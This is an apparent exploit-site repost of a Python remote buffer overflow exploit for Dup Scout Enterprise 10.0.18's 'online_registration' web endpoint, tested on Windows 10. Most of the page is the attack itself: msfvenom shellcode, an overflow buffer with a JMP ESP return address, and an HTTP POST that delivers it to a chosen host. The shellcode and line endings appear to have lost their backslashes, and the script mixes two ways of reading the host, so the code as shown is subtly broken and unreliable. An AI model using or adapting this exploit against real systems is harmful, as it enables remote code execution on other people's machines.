Home Tools Exploits & CVE's Dup Scout Enterprise 10.0.18 Buffer Overflow

Dup Scout Enterprise 10.0.18 Buffer Overflow

December 8, 2020

1487

Dup Scout Enterprise version 10.0.18 suffers from a remote buffer overflow vulnerability.

# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
# Requires web service to be enabled.
# Tested on Windows 10 Pro (x64)
# Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457
# Credits: Tulpa and SICKNESS for original exploits
# Modified: @0rbz_

import socket,os,time,struct,argparse,sys

parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()

host = args.host
port = 80

# msfvenom --platform windows -p windows/exec CMD=calc.exe -b "x00x0ax0dx25x26x2bx3d" -f py

buf =  ""
buf += "xb8xa0xa1xfdx38xd9xf7xd9x74x24xf4x5ax31"
buf += "xc9xb1x31x31x42x13x83xc2x04x03x42xafx43"
buf += "x08xc4x47x01xf3x35x97x66x7dxd0xa6xa6x19"
buf += "x90x98x16x69xf4x14xdcx3fxedxafx90x97x02"
buf += "x18x1excex2dx99x33x32x2fx19x4ex67x8fx20"
buf += "x81x7axcex65xfcx77x82x3ex8ax2ax33x4bxc6"
buf += "xf6xb8x07xc6x7ex5cxdfxe9xafxf3x54xb0x6f"
buf += "xf5xb9xc8x39xedxdexf5xf0x86x14x81x02x4f"
buf += "x65x6axa8xaex4ax99xb0xf7x6cx42xc7x01x8f"
buf += "xffxd0xd5xf2xdbx55xcex54xafxcex2ax65x7c"
buf += "x88xb9x69xc9xdexe6x6dxccx33x9dx89x45xb2"
buf += "x72x18x1dx91x56x41xc5xb8xcfx2fxa8xc5x10"
buf += "x90x15x60x5ax3cx41x19x01x2ax94xafx3fx18"
buf += "x96xafx3fx0cxffx9exb4xc3x78x1fx1fxa0x77"
buf += "x55x02x80x1fx30xd6x91x7dxc3x0cxd5x7bx40"
buf += "xa5xa5x7fx58xccxa0xc4xdex3cxd8x55x8bx42"
buf += "x4fx55x9ex20x0exc5x42x89xb5x6dxe0xd5"

buffer = "x41" * 260
buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
buffer += "x90" * 20
buffer += buf
buffer += "x90" * (10000 - len(buffer))

evil =  "POST /online_registration HTTP/1.1rn"
evil += "Host: " + sys.argv[2] +"rn"
evil += "User-Agent: Mozilla/5.0rn"
evil += "Connection: closern"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
evil += "Accept-Language: en-us,en;q=0.5rn"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn"
evil += "Keep-Alive: 300rn"
evil += "Proxy-Connection: keep-alivern"
evil += "Content-Type: application/x-www-form-urlencodedrn"
evil += "Content-Length: 17000rnrn"
evil += "customer_name=" + buffer
evil += "&unlock_key=" + buffer + "rn"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((host,port))
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()

Dup Scout Enterprise 10.0.18 Buffer Overflow

Follow us on Instagram @thecyberpost

EDITOR PICKS

PrusaSlicer 2.6.1 Arbitrary Code Execution

AMPLE BILLS 0.1 SQL injection

WBCE 1.6.0 SQL Injection

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Bluetooth Application 5.4.277 Unquoted Service Path

RWS WorldServer 11.7.3 Session Token Enumeration

Virus.Win32.Shodi.e Remote Command Execution